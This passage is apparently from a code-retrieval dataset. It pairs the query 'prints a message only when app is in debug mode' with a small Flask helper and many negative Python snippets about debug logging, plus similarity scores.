int:\n try:\n if not level:\n raise KeyError\n return LOG_LEVELS[str(level).upper()]\n except KeyError:\n unique_set = set(\n [str(x) for x in list(LOG_LEVELS.keys())]\n + [str(x) for x in list(LOG_LEVELS.values())]\n )\n opts: str = \", \".join(sorted(list(unique_set)))\n raise ValueError(f\"Invalid log level: {level}. Available options: {opts}\")", "def log(self, log_level, client, msg):\n logger_dict = {\n 'CurrentTime': strftime(\"%a, %d %b %Y %X\", localtime()),\n 'ThreadName': threading.current_thread().getName()\n }\n if client == -1:\n formatted_message = msg\n else:\n formatted_message = '{0}: {1} {2}'.format(client[0], client[1], msg)\n\n # logging.debug('%s', utils.colorize_log(log_level, formatted_message), extra=logger_dict)", "def setLevel(level='info'):\n\n mapper = {\n 'critical' : logging.CRITICAL, \n 'error' : logging.ERROR,\n 'warning' : logging.WARNING,\n 'info' : logging.INFO,\n 'debug' : logging.DEBUG,\n }\n if level not in mapper:\n raise ValueError('level must be one of these: {}'.format(list(mapper.keys())))\n else:\n logger.setLevel(mapper[level])" ]
[ "0.81246626", "0.78997695", "0.78037274", "0.780287", "0.7799478", "0.77843386", "0.77657396", "0.77248126", "0.77185434", "0.7705718", "0.76910615", "0.7610388", "0.75899214", "0.7555818", "0.75395006", "0.74972963", "0.74645865", "0.7456792", "0.74560916", "0.7455943", "0.74517965", "0.74315274", "0.7425933", "0.7405377", "0.7266313", "0.7170448", "0.7078647", "0.70643526", "0.7008528", "0.7006272", "0.6992314", "0.69726485", "0.69462836", "0.69350195", "0.69215125", "0.69183284", "0.69125384", "0.69080484", "0.6896044", "0.6892852", "0.68894583", "0.6889306", "0.68828946", "0.6880664", "0.68168116", "0.6797881", "0.67750144", "0.67741156", "0.6767425", "0.676642", "0.67443514", "0.6736891", "0.6729394", "0.66940796", "0.6693995", "0.6693676", "0.6692919", "0.6659191", "0.66528565", "0.66519773", "0.6645216", "0.66377234", "0.66333026", "0.66264844", "0.6621791", "0.6584879", "0.657602", "0.65676725", "0.6564231", "0.6551886", "0.65499645", "0.65410405", "0.6540105", "0.6529414", "0.65291876", "0.65234315", "0.6522511", "0.65024763", "0.64855814", "0.6474124", "0.6455695", "0.64466625", "0.64292073", "0.64227575", "0.6419987", "0.64194745", "0.64142203", "0.6410922", "0.63983494", "0.6396401", "0.63803315", "0.6374585", "0.63683426", "0.636618", "0.6363434", "0.63466114", "0.6343556", "0.6341301", "0.6335866", "0.63312304" ]
0.68746495
44
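The negative snippets collected in the record above all demonstrate the same pattern: a message is emitted only when its level clears a configured threshold. As a point of comparison, a minimal self-contained sketch of that pattern using only Python's standard logging module follows; the helper name and the level-name handling are illustrative assumptions, not taken from this record's document field.

import logging

logging.basicConfig(format="%(levelname)s: %(message)s", level=logging.INFO)
logger = logging.getLogger(__name__)

def log_at_level(level_name, message):
    # getLevelName maps a registered name such as "DEBUG" to its numeric value;
    # an unknown name comes back as a string, which is treated as an error here.
    level = logging.getLevelName(level_name.upper())
    if isinstance(level, int):
        logger.log(level, message)
    else:
        logger.error("unknown log level %r: %s", level_name, message)

log_at_level("info", "visible at the default INFO threshold")
log_at_level("debug", "suppressed unless the threshold is lowered to DEBUG")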
Prints a message only when app is in debug mode
def print_debug(message):
    if current_app.debug:
        print(message)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def debug():\n assert current_app.debug == False, \"Don't panic! You're here by request of debug()\"", "def checkDebug(message):\n if debug == True:\n print(message)", "def debug(msg):\n if not DEBUG_ON:\n return\n print(\"DEBUG:\" + str(msg))", "def print_debug(msg):\n if IS_DEBUG:\n print(msg)", "def debug() -> bool:", "def DebugMessage(message=\"\"):\n if global_debug:\n print(\"\\033[93m DEBUG: \" + message + \"\\033[0m\")", "def debug(msg):\n if(CONFIG['debug']):\n logIt(msg)", "def check_and_print_debug_message(self, msg):\n if self._params.debug:\n print(\"Info: {}\".format(msg))", "def printdebug(self, msg):\n if self.debug > 0:\n print(msg)", "def debug(s):\n if app.config['DEBUG']:\n print(s)", "def debug(s):\n if app.config['DEBUG']:\n print(s)", "def debugLog(message):\n if debugFlag != None:\n print \"#debug: \" + str(message)", "def output_debug(text):\n if conf.debug:\n output_message('[DEBUG] ' + text)", "def main(debug):\n click.echo('Debug mode is {{}}'.format(debug))", "def cli(debug):\n print(f\"Debug mode is {'on' if debug else 'off'}\")", "def debug(msg):\n if settings.DEBUG:\n print \"DEBUG: cli.%(msg)s\" % locals()", "def debug(cls, msg, debug=True):\n if debug:\n Console.msg(msg)", "def debug(self, message):\r\n if self._debug:\r\n print('[Debug] %s' % message)", "def debugPrint(text: str):\r\n if DEBUG:\r\n print(text)", "def debug():", "def __debugInfo(self, msg):\n\t\tif self.verbosity:\n\t\t\tprint(stylize(\"[*] DEBUG: {}\".format(msg), colored.fg(\"wheat_1\")))", "def debug(self, msg=\"\"):\n if self.verbose:\n print(\"Debug: \" + msg)", "def _debug_print(message):\n\n if _debug == True:\n print(message)", "def debug(self, msg):\n if self._debug:\n print \"%s\" % (msg)", "def debug_print(text):\r\n if settings.debug:\r\n print (text)", "def debug(mode=True):\r\n global DEBUG\r\n DEBUG = bool(mode)", "def is_debug ():\n\n return __debug__ and DEBUG", "def d_print(msg):\n if (DEBUG == 1):\n print(msg)", "def main(config, debug):\n config.debug = debug\n if config.debug:\n click.echo('Debug info...')", "def debug(msg):", "def print_debug(self, msg):\n if self.debug:\n print(\"[DEBUG {0}] {1}\".format(datetime.datetime.now(), msg))", "def debug(message):\n if os.environ.get(\"PYCP_DEBUG\"):\n print message", "def debug(self, msg):\n if self.ansible._debug or self.ansible._verbosity > 2:\n self.ansible.log(f'[DEBUG] {msg}')", "def debug():\n return bool(_environ.get(\"ACCELPY_DEBUG\", False))", "def debugPrint(dbg, msg):\n if(dbg):\n print(msg)", "def debug(self, message):\r\n pass", "def debug(self, msg):\n debug(msg)", "def debug(string):\n if conf.DEBUG:\n outputs.print_debug(string)", "def dprint(msg):\n if defaults.debug:\n print('debug: %s' % msg)", "def print_debug(message: str):\n global debug\n if debug:\n print(\"%s%s%s\" % (KCYN, message, KNRM))", "def print_if_debug(debug, cadena):\n if debug:\n print(time.strftime(\"%H:%M:%S DEBUG => \") + cadena)", "def debug(cls, message):\n if cls.verbose:\n print('[DEBUG] {0}'.format(message))", "def debug(state, message):\n if state:\n print(message)", "def debug(self, module, message):\n if self.log_level <= consts.LOG_LEVEL_DEBUG:\n print(\"DEBUG : %s: %s\" % (module, message))", "def on_screen(self) -> bool:\n\n return (\n self.env_var_helper.set_name(\"PYFUNCEBLE_DEBUG_ON_SCREEN\").exists()\n or self.env_var_helper.set_name(\"DEBUG_PYFUNCEBLE_ON_SCREEN\").exists()\n )", "def debug(module, message):\n if loggingLevel >= loggingLevelDebug:\n ModuLog.log(\"D\", module, message)", "def debug_mode(x):\n if x:\n 
logger.setLevel(logging.DEBUG)\n ch.setLevel(logging.DEBUG)\n _DEBUG = True\n KEEP_TEMPFILES = True\n logger.info(\n 'Debug mode enabled. You may also want to set '\n 'pybedtools.KEEP_TEMPFILES=True to prevent automatic deletion '\n 'of files upon exit.')\n else:\n logger.setLevel(logging.INFO)\n ch.setLevel(logging.INFO)\n _DEBUG = False\n KEEP_TEMPFILES = False\n logger.info('Debug mode disabled')", "def setDebug():\n\tglobal debug\n\tdebug = True", "def _debug_log(self, msg):\n if not self.debug:\n return\n sys.stderr.write('{}\\n'.format(msg))", "def _debug_log(self, msg):\n if not self.debug:\n return\n sys.stderr.write('{}\\n'.format(msg))", "def _debug():\n return _DEBUG", "def DEBUG(self, _strDebugMessage=\"\"):\n self.edLogging.DEBUG(_strDebugMessage)", "def debug(self, msg):\n\n if (self.logger): self.logger.debug(msg)", "def logDebug(self, msg) :\n if self.debug :\n sys.stderr.write(\"%s\\n\" % msg)\n sys.stderr.flush()", "def debug(state: bool, /) -> None:", "def debug(self):\n return Config.DEBUG", "def debug(self, text):\n\n debug_text = self._get_debug_text(text)\n if self._live_debug_level == logging.DEBUG and self._live_debug_enabled:\n if self.py_cui_root is not None:\n self.py_cui_root.status_bar.set_text(debug_text)\n super().debug(debug_text)\n else:\n super().debug(debug_text)", "def show_debug_msg(self) -> None:\n if self.debug_mode:\n for point in self.points:\n print(point.debug_info())", "def debug(self, msg):\n\n\t\tif( self.logger ): self.logger.debug( msg )", "def main(ctx, debug):\n if debug:\n logger.setLevel(logging.DEBUG)", "def show_debug(self):\n return self.debug and self.n_evaluations == 0", "def __debug(msg):\n\n pass", "def DEBUG(*args, **kwargs):\n if __name__ != \"__main__\":\n print(*args, **kwargs)", "def debug(msg):\n #print(msg)\n pass\n #end debug", "def handle_admindebugon(bot, event):\n event.chan.data.debug = True;\n event.chan.save()\n event.reply(\"debugging is enabled for %s\" % event.channel)", "def debug_print(debug_data):\n if DEBUG_MODE == \"true\":\n pp.pprint(debug_data)", "def is_debugging() -> bool:\n if os.getenv(\"DEBUGGING\") == \"1\":\n return True\n return False", "def debug(debug_string, to_debug):\n if to_debug:\n print(\"DEBUG {0}: {1}\".format(strftime('%H:%M:%S'), debug_string))", "def debug(self, message):\n return self.log(\"DEBUG\", message)", "def debug(self, msg, *args, **kwargs):\n pass", "def debug(message):\n global LAST_LOG\n if 'DEBUG' in os.environ: # pragma: no cover\n LAST_LOG = message\n cprint('\\r[DBG] {0}'.format(message), 'blue', file=sys.stderr)\n else:\n LAST_LOG = message", "def debug(self):\n\t\tif self.handler.bullet_debug_node.isHidden():\n\t\t\tself.handler.bullet_debug_node.show()\n\t\t\tself.handler.drone_manager.set_debug(True)\n\t\telse:\n\t\t\tself.handler.bullet_debug_node.hide()\n\t\t\tself.handler.drone_manager.set_debug(False)", "def setdebug(self):\n self.debug = True\n irclib.DEBUG = True\n print \"Debug mode on\"", "def is_debug(cls):\n return Traceable.debug & cls.DEBUG_ENABLE", "def debug(msg):\n log_msg(DEBUG, msg)", "def debug(self) -> bool:\n return self._data[ATTR_DEBUG]", "def debug_print(message):\n if DEBUG:\n with print_lock:\n print((Colours.HEADER + 'DEBUG: ' + Colours.END_COLOUR + message).strip())", "def debug(self, msg):\n\n self(msg, DEBUG)", "def debug(self, msg):\r\n self.logger.debug(msg)", "def debugging_tests():\n logging.warning(\"Running debugging tests...\")\n pass", "def debug(self, *args):\r\n msg = \" \".join([str(x) for x in args])\r\n if not 
self.signal_debug(self, (msg)):\r\n logging.debug(msg)", "def debug(self, msg):\n debug_msg = self._debug_color\n debug_msg += \"[SHOULDER_DEBUG] \" + msg\n debug_msg += self._reset_color\n self.logger.debug(debug_msg)", "def debug(self):\n self._debug = True\n self.run()\n self._debug = False", "def output_debug_info(self):", "def test_func(debug: bool) -> None:\n click.echo(debug)", "def debug( cls, msg ):\n cls.log( logging.DEBUG, msg )", "def debug_print(self, *args, **kwargs):\n print(\"APP_DEBUG_PRINT\", args, kwargs)", "def debug(msg):\n return log().debug(msg)", "def get_debug():\n return _DEBUG", "def is_debug_environment():\n return find_loader('cli') is None", "def debug(self):\n return self.settings['debug']", "def debug():\n return int(DEBUG)", "def set_debug_mode(self):\n self.debug_mode = True", "def debug(string):\n if verbose:\n print string\n return", "def message_debug(self, m):\n self.message(m, logging.DEBUG)", "def vv_flag():\n log.setLevel(logging.DEBUG)", "def debug(self, msg):\n\n self.logger.debug(msg)", "def debug_option(args, run):\n run.debug = True", "def debug ( self , message , *args , **kwargs ) :\n return self.logger.debug ( message , *args , **kwargs )", "def debug(message, output_no_verbose=False):\r\n global _quiet, _verbose\r\n if not _quiet and (output_no_verbose or _verbose):\r\n print(\"{0} - {1}\".format(datetime.datetime.now(), message))" ]
[ "0.8137028", "0.80153483", "0.77376115", "0.7687844", "0.76748055", "0.767379", "0.7656623", "0.7569436", "0.7528649", "0.7510831", "0.7510831", "0.74950415", "0.7483869", "0.74653614", "0.74565285", "0.74526405", "0.7379881", "0.736538", "0.734727", "0.73451245", "0.734026", "0.7325392", "0.7305496", "0.7291941", "0.72741944", "0.72255635", "0.71924275", "0.7152718", "0.7141016", "0.7116224", "0.7094752", "0.7087041", "0.7085085", "0.7050721", "0.7030426", "0.7024101", "0.69900244", "0.6957192", "0.69482344", "0.6945148", "0.69331694", "0.69281995", "0.69267744", "0.69254845", "0.6887735", "0.68554395", "0.6781559", "0.6768594", "0.67612785", "0.67612785", "0.6755178", "0.67535794", "0.67514646", "0.67390686", "0.67390144", "0.6736862", "0.67311126", "0.6715729", "0.6708048", "0.66842055", "0.66772014", "0.66769046", "0.6644283", "0.6637527", "0.6610033", "0.66091", "0.6604148", "0.65935373", "0.65924406", "0.6586288", "0.6575063", "0.65616137", "0.65598744", "0.6556244", "0.65439886", "0.6537748", "0.65356076", "0.6534783", "0.6515945", "0.651545", "0.6505275", "0.6505093", "0.6494387", "0.64698416", "0.6468591", "0.6461615", "0.6447749", "0.6434418", "0.6432235", "0.6424802", "0.6402115", "0.6398557", "0.63956213", "0.6386979", "0.6382582", "0.6382512", "0.6376612", "0.63763", "0.63349307", "0.63342273" ]
0.8150175
0
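The print_debug document above relies on current_app, which is a context-bound proxy, so the helper only works inside an active application context. A minimal runnable sketch assuming Flask follows; the app setup and the example call are illustrative additions, only the helper body comes from the record.

from flask import Flask, current_app

app = Flask(__name__)
app.debug = True  # with debug off, the helper silently does nothing

def print_debug(message):
    if current_app.debug:
        print(message)

with app.app_context():
    print_debug("only printed because app.debug is True")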
Call this function after determining game should end
def endGame(self, message):
    print(self.board)
    print("Game over! " + message)
    self.gameOver = True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def endGame(self):\n pass", "def quit_game(self):\n self.done = True", "def end_game(self):\n self.game.stop_running()", "def api_end_game(self):\n pass", "def end(self, won, reason):\n pass\n # replace with your end logic", "def endGame(self):\n #self.active = False\n self.inGame = False\n self.hand = []\n self.position = None", "def end_of_game(self, winner):\n pass", "def endgame(winner):", "def end_of_game(self):\n self.log.info('The game has ended')\n #\n end_callout = callout.FinishCallout(\n 'callout',\n 'finish_callout',\n ['exit_button'],\n S['end-game-callout'],\n self.deaths,\n )\n end_callout.show()\n #\n self.objects.append(end_callout)\n #\n while True:\n if end_callout.dismiss_button:\n music.fadeout(2)\n yield 2\n break\n yield 0\n #\n sys.exit(0)", "def game_exit(self):\n self.set_state(GameState.EXITING)\n self.game_stop()\n self.game_log_statistics()", "def stand(self):\n self.endgame()", "def endGame(self):\r\n Game.__instance = None", "def after_turn(self):\n pass", "def end_of_game(self):\n end_game = pyip.inputYesNo(f'\\nDo you want to play again?: ')\n\n if end_game == 'no':\n print('\\n-- GAME OVER --')\n sys.exit()\n elif end_game == 'yes':\n self.game_counter += 1", "def check_game_end(self):\r\n\r\n if np.all(self.remaining == -1): # end of game\r\n self.show_results() # show the final results\r\n sys.exit() # exit the program\r", "async def on_end(self, game_result: Result):", "def end_game(self):\n if self._waiting_for_players:\n [p.client.cancel_interactions() for p in self.all_players]\n self._waiting_for_players = False\n\n super().end_game()\n\n self.states[self.state][\"next\"] = \"STOP\"\n self._run_next_state()", "def endCompetition(self):\n self.robot_exit = True", "def __end_turn(self):\n self._turn_counter += 1\n # päivittää pelaajan\n self._player %=2\n self._player += 1\n if (self._gui):\n self.__status[\"text\"] = self._player_names[self._player-1]\n self.__turn_counter_label[\"text\"]= \"{}. Turns taken\".format\\\n (self._turn_counter)\n self.__turn_counter_label.update()\n\n # This will cause stackoverflow in training.\n if (self._state == PLAY and self.__check_ai_turn()):\n self.__ai_turn()", "def end_game(self):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, date=date.today(), won=self.win,\n tiles_remaining=self.tiles_remaining,\n difficulty=self.difficulty)\n score.put()", "def finish():\n pass", "def end(self):\n winners = mafia.str_player_list(self.game.winners())\n logging.info(\"Game over! Winners: %s\" % winners)\n\n subject = \"%s: The End\" % self.name\n body = \"Game over!\\n\\nCongratulations to %s for a well \" \\\n \"(or poorly; I can't tell) played game!\" % winners\n self.send_message(mafia.events.PUBLIC, subject, body)", "def set_end_game(self):\n # For now, we just need to set a flag indicating we should end\n # the game. 
When we check whether we should load another story\n # or repeat a repeating script, this flag will be used to skip\n # back to the main session script, to the end of the game.\n self._end_game = True", "def bcp_game_end(self, **kwargs):\n self.player = None\n self.events.post('game_ended', **kwargs)", "def leave_loose_game(self):\n self.update_json_file()\n self.end = True\n self.root.destroy()\n GameOver()", "def check_for_end_game(self):\n if self.grid.snake_died():\n self.scores.append(self.score)\n if self.score >= 1:\n self.averages.append(sum(self.scores) / (len(self.averages) + 1))\n # self.plot_scores()\n self.reset()", "def on_client_exit(self, game) -> None:\n pass", "def end_game(self, end_msg):\n self.word_view.reveal_word()\n self.greeterboard.update_gallows()\n self.greeterboard.greets(end_msg)", "def end_game(self):\n controller = self.controller\n self.end_game_running = True\n\n while self.end_game_running:\n controller.keyboard_end_game_control(self)\n controller.display_end_game()\n\n self.reset_game()\n self.run()", "def EndGame(self):\n check_endgame = not self.player.getPlayer().isGeneralExist()\n\n return check_endgame", "def end(self):\n # Update all the things.\n end_font = pygame.font.SysFont(*END_FONT)\n final_score = self.player.nest.acorn_count\n message = \"Game over! Final score: {0}\".format(final_score)\n text_surf = end_font.render(message, True, FONT_COLOUR)\n text_rect = text_surf.get_rect()\n text_rect.center = (SCREEN.width // 2, SCREEN.height // 2)\n\n # Draw all the things.\n self.screen_surf.fill(BKGD_COLOUR)\n self.screen_surf.blit(text_surf, text_rect)\n\n # Render the screen.\n pygame.display.update()\n\n # The main game loop.\n while self.mode is WorldMode.end:\n self.handle_events()", "def finish(self):\n pass", "def finish(self):\n pass", "def _end_game(self, winner_id=0):\r\n if winner_id == 0:\r\n # print(\"The game was a tie!\")\r\n pass\r\n else:\r\n # print(\"{0} has won the game!\".format(winner_id))\r\n pass\r\n self.winner = winner_id", "def finish():", "def finish():", "def finish():", "def finish():", "def end_meassuring(self):\n self.enabler = 0\n #self.t.join()\n return 1", "def finish(self):", "def finish(self):", "def end_game(self):\n print(str(self.__players[0]._Player__name) + \" score is: \"\n + str(self.__fields[0].score))\n print(str(self.__players[1]._Player__name) + \" score is: \"\n + str(self.__fields[1].score))\n Game.play = False", "def end_pygame(self):\n pygame.quit()", "def end(self):\n ...", "def endGame(self, msg):\n title = \"Game Over\"\n QMessageBox.information(self, title, msg)\n self.reset()", "def endgame_winner(self) :\n raise NotImplementedError", "def event_game_over(self):\n print('Game over!')\n self._cmd_exit()", "def end(self) -> None:\n unicurses.endwin()", "def display_end_game(self):\n game_view = self.get_view.get_game_view\n character = self.model.get_character\n\n if character.alive:\n game_view.game_win()\n else:\n game_view.game_over()\n\n game_view.update_display()", "def _complete(self):\n self._last = self._touch\n if self._game.getWall().getBricks() == []:\n m = 'Congratulations!\\nYou Won\\n\\nClick to play again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)\n self._playAgain()\n elif self._game.getPlayerLives() == 0:\n m = 'Game Over\\nClick to try again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)-10\n self._playAgain()\n self._countdownTime = 0\n self._countdownMessage = GLabel(text='3', font_size=40,x=GAME_WIDTH / 2.0,\n y=GAME_HEIGHT*(2.0/3.0), halign='center',\n valign='middle', 
linecolor=colormodel.WHITE)\n self._pausedMessage = GLabel(text=m,font_size=f,x=GAME_WIDTH / 2.0,\n y=h, halign='center', valign='middle',\n linecolor=colormodel.WHITE)", "def end_game(self):\n\n # End the game\n if game.game_over is False:\n\n correct = game.endscore()\n self.update()\n self.time = self.timer()\n\n # Loop through every space and reveal atoms and guess results.\n won = 0\n missed = 0\n board = self.ids.board\n for item in board.children:\n # Disable spaces to prevent them from being pressed.\n item.disabled = True\n item.disabled_color = item.color\n if isinstance(item, Space) is True:\n number = int(item.number)\n space = game.spacelist[number]\n # Guessed right\n if space.correct is True:\n item.text = 'O'\n item.color = item.disabled_color = scheme.green\n # Guessed wrong\n elif space.guess is True and space.correct is False:\n item.text = 'X'\n item.color = item.disabled_color = scheme.black\n missed += 1\n # Missed atom\n elif space.atom is True and space.guess is False:\n item.text = 'O'\n item.color = item.disabled_color = scheme.red\n\n for i in range(correct):\n self.ids['tracker' + str(i + 1)].color = scheme.green\n\n # Update end button\n if missed == 0:\n won = 1\n text = 'you found them all!'\n elif missed == 1:\n text = 'you missed an atom!'\n elif missed == 5:\n text = 'you missed \\'em all!'\n else:\n text = 'you missed ' + str(missed) + ' atoms!'\n\n self.ids.end_button.text = text\n\n # Prep and send to end screen\n elif game.game_over is True:\n end_screen = sm.get_screen('end_screen')\n end_screen.ids.end_score.text = str(game.score)\n end_screen.ids.time.text = str(self.time)\n\n sm.current = 'end_screen'", "def end_phase():\n pass", "def test_finish_draw(self):\n game = self.ending(['bbw.wwww'], 8, 1)\n game.man_move(0, 3)\n self.assertTrue(game.finished)", "def _end_episode(self):\n self.turn_cnt = 0\n self.episode_cnt += 1\n self.contexts = None\n self.seed_utterances = None\n self.reset_agents()", "async def endGame(self, ctx):\n print(\"Ending game ...\")\n await self.movePlayer(ctx=ctx, voiceChannel=self.lastVoiceChannel, reason=\"Fin de partie.\")\n await self.deleteCategory(ctx=ctx, reason=\"Fin de partie.\")\n await self.deleteRole(ctx=ctx, reason=\"Fin de partie.\")\n print(\"Game ended\")\n await self.delete()", "def finish(self) -> None:", "def finish(self) -> None:", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def endgame(self):\n #reveals the dealer's first card then the dealer hits until the dealer's hand's value is above 16\n self.dealer_hand[0].face_up()\n if self.dealer_hand[0].value in FACE_CARDS:\n self.dealer_value += 10\n elif self.dealer_hand[0].value == \"A\":\n self.dealer_value += 11\n self.dealer_ace_count += 1\n else:\n self.dealer_value += int(self.dealer_hand[0].value)\n\n if self.dealer_value > 21:\n if self.dealer_ace_count > self.dealer_almost_bust:\n #To prevent a Bust, the Dealer's Ace became a one\n self.dealer_value -= 10\n self.dealer_almost_bust += 1\n else:\n self.player_win()\n #House always wins Ties\n elif self.dealer_value == 21:\n self.player_lose()\n\n while self.dealer_value < 17:\n self.hit(\"dealer\")\n\n if (self.player_value - self.dealer_value) > 0:\n self.player_win()\n else:\n self.player_lose()", "def leave(self):\n self.pleaseQuit=1", "def callback_game_loop(self) -> None:\n self._goal_generate()\n self._update()\n self.reset()\n\n while self._player != self._goal:\n self._update()\n action = self._action_callback(\n self._player.np,\n self._goal.np,\n 
*self._action_callback_args,\n )\n if action == \"QUIT\":\n break\n self._player_erase()\n self.FUNCMAP[action]()\n self._update()\n\n if self._display:\n time.sleep(0.1)\n try:\n if chr(cv2.waitKey(5)) in self.KEYMAP[\"QUIT\"]:\n break\n except ValueError:\n pass\n\n if self._display:\n print(f\"Steps taken: {self._routes[self._current_route_key]}\")\n\n if self._display:\n cv2.waitKey(0)", "def end_game(self):\n pygame.event.clear()\n self.screen.fill(BLACK)\n self.show_on_screen(\"GAME OVER\", (500, 600), font_size=50)\n self.show_on_screen(\"Press \\\"N\\\" to start a new game\", (500, 650), font_size=30)\n self.show_on_screen(\"Press \\\"ESC\\\" to exit\", (500, 710), font_size=30)\n self.show_on_screen(\"SCORE: \" + str(self.score), (500, 560), font_size=50)\n pygame.display.flip()\n\n # clears previously pressed key\n pygame.event.wait()\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n elif event.key == pygame.K_n:\n self.reset_lander()\n self.play()", "def test_endofgame(self):\n game = self.ending(['bwwwwww.'], 8, 1)\n game.man_move(0, 7)\n self.assertTrue(game.finished)", "def endGame(self):\n\t\thue = 0\n\t\thueInc = 360 / len(self.scores.items())\n\n\t\tfor e in self.scores.items():\n\t\t\tcolor = QColor()\n\t\t\tcolor.setHsv(hue, 255, 240)\n\t\t\thue += hueInc - 1\n\t\t\tself.scores[e[0]] = (e[1][0], color.getRgbF())\n\n\t\t# actually ending the game here...\n\t\tfor player in self.players.values():\n\t\t\t\tplayer[0].endGame()\n\t\tself.gameEnded.emit()", "def endGame(self, msg, win):\n elapsedTime = time.time() - self.startTime\n readableTime = str(int((elapsedTime / 60) / 60))\n readableTime += \":\" + str(int(elapsedTime / 60))\n readableTime += \":\" + str(elapsedTime % 60)[0:6]\n msg +=\"Time: \" + readableTime\n self.revealBombs(win)\n self.flagLabel.configure(text=\"Flags: \"+str(self.numFlags))\n messagebox.showinfo('Game Over', msg)", "def end_turn(self):\r\n self.turn += 1", "def finished(self):\n pass", "def end_game(self):\n self.end_writer.write(f\"You have won with {self.score} points! \" \\\n \"Do you want to play again? 
(y/n)\", font=(\"Arial\", 16, \"normal\"))\n turtle.Screen().onkey(None, \"Left\")\n turtle.Screen().onkey(None, \"Right\")\n turtle.Screen().onkey(None, \"Up\")\n turtle.Screen().onkey(None, \"Down\")", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, \n date=date.today(), \n won=won,\n attempts_remaining=self.attempts_remaining, \n answer=self.answer\n )\n score.put()", "def finished(self):", "def updateComplete(self):\n self.livesScreen()\n if self.getWave().getLives() == 0:\n self.deathScreen()\n else:\n self.winScreen()", "def breakout_loop(self):\n while self.playing:\n self.handle_events()\n self.update()\n if self.game_over:\n self.current_menu = self.fail_menu\n self.playing = False\n self.reset()\n self.draw()", "def play_game(self):\n # need everyone to pass to move to next phase?\n self.deal_cards()\n self.plant_food()", "def GAMEOVER_LOOP():\n pass", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.player, date=date.today(), won=won,\n bombs=len(self.player_bombs))\n score.put()", "def end_game(self, won=False):\n self.game_over = True\n self.put()\n # Add the game to the score 'board'\n score = Score(user=self.user, date=date.today(), won=won,\n guesses=self.attempts_allowed - self.attempts_remaining)\n score.put()", "def end(self) -> None:", "def _finish(self):\n self.stage = {}", "def end_of_game(self):\n try:\n play_again = input(\"Would you like to play again?[y]es/[n]o: \").lower()\n except ValueError:\n print(\"That is is not a valid value please use either y or n.\")\n self.end_of_game()\n if play_again == \"y\":\n # Phrase(self.player_guess, new_game=True, run_extend=True)\n # Character(self.player_guess, self.selected_phrase, life_check=True, new_game=True)\n Game()\n elif play_again == \"n\":\n print(\"\\n\"\"Thank you for playing, see y'all next time.\"\"\\n\")\n sys.exit()\n else:\n print(\"That is is not a valid value please use either y or n.\")\n self.end_of_game()", "def tellIfEnded(self):\n self.congratulate()", "def finished(self):\n\t\telog(\"finished\")", "def on_end(self, ctx):\n pass", "def state_finish_exit(cfg, app, win):", "def end_game():\n pygame.quit()\n exit()", "def main(self):\n _age = info.getInfo(self)\n _flag = game.check_age(self, _age)\n if _flag == False:\n exit()\n game.wants_to_play(0)", "def endBattle(self):\n self.map.removeDead()\n self.cancelAttackMode()\n self.deselectUnit()", "def state_finish_do(cfg, app, win, events):", "def finish_game(self) -> bool:\n if not self.started and self.finished:\n return\n\n self.started = False\n self.finished = True\n\n players_list = self.games_list[self.game_index][\"players\"]\n self.games_list[self.game_index][\"players\"] = \\\n list(dict.fromkeys(players_list))\n\n return", "def at_exit(self):\n self.owner.set_layer(self.owner.GAME_LAYER)\n self.owner.current_layer.run()\n self.owner.current_layer.at_exit()", "def endMyTurn(self):\n try:\n result = self.game.server.endEmpireTurn(self.game.authKey)\n if result == 0:\n if self.game.myEmpire['roundComplete'] == 1:\n self.modeMsgBox('You have now un-ended your turn')\n self.game.myEmpire['roundComplete'] = 0\n else:\n self.modeMsgBox('Your turn has been ended, thankyou')\n self.game.myEmpire['roundComplete'] = 1\n self.mainmenu.writeTextRoundEnds()\n elif type(result) == types.StringType:\n self.modeMsgBox(result)\n else:\n \"\"\"End Turn and wait for it to end\"\"\"\n result 
= self.game.server.endRound(self.game.authKey)\n self.game.server.logout(self.game.authKey)\n from anw.modes.modelogin import ModeLogin\n newMode = ModeLogin(self.game, 200)\n self.game.enterMode(newMode)\n except:\n self.modeMsgBox('endMyTurn->Connection to Server Lost')", "def handleEnd(winner):\n if winner != 0:\n if winner == 1: print(\"human win\")\n if winner == 2: print(\"cpu win\")\n if winner == 3: print(\"draw game\")\n return True\n return False", "def end(self, win):\n if win:\n print('\\033[92m', \"task won.\", '\\033[0m')\n if self._win_sound is not None:\n self.sound_player.play(self._win_sound)\n else:\n print('\\033[91m', \"task lost\", '\\033[0m')\n if self._loose_sound is not None:\n self.sound_player.play(self._loose_sound)\n if self._fulfill_if_lost:\n self.force_fulfill()\n\n # removing the loose task\n if self._loose_task is not None:\n self.gameEngine.taskMgr.remove(self._loose_task)\n if self._to_do_task is not None:\n self.gameEngine.taskMgr.remove(self._to_do_task)\n\n # starting the next step\n self.gameEngine.scenario.start_next_step()", "def exit_game(self):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n 'door_closed.jpg'\n self.ids['button' + str(i)].disabled = False\n setattr(self, 'door'+str(i)+'_counter', 0)\n self.manager.current = 'MainMenu'\n self.ids['score'].text = 'SCORE: 0'\n self.score = 0", "def Finish(self):\n pass", "def on_exit(self, next_scene):", "def end_game(self, game_state: str):\n if game_state == \"win\":\n end_message = \"{0} wins! Would you like to play again?\".format(self.players[self.game.whose_turn])\n else:\n end_message = \"Cat's game! Would you like to play again?\"\n play_again = messagebox.askyesno(title='Game over', message=end_message)\n if play_again:\n self.game.reset_game_data()\n self.reset_game_ui()\n else:\n self.window.destroy()", "def end(self, is_won):\n if is_won:\n self.blit_background()\n self.screen.blit(self.won, (0, 0))\n self.render_screen()\n self.render_font()\n else:\n self.blit_background()\n self.screen.blit(self.lost, (0, 0))\n self.render_screen()\n self.render_font()", "def end_game(self, winner):\n reward = self.reward(winner)\n if self.learning:\n 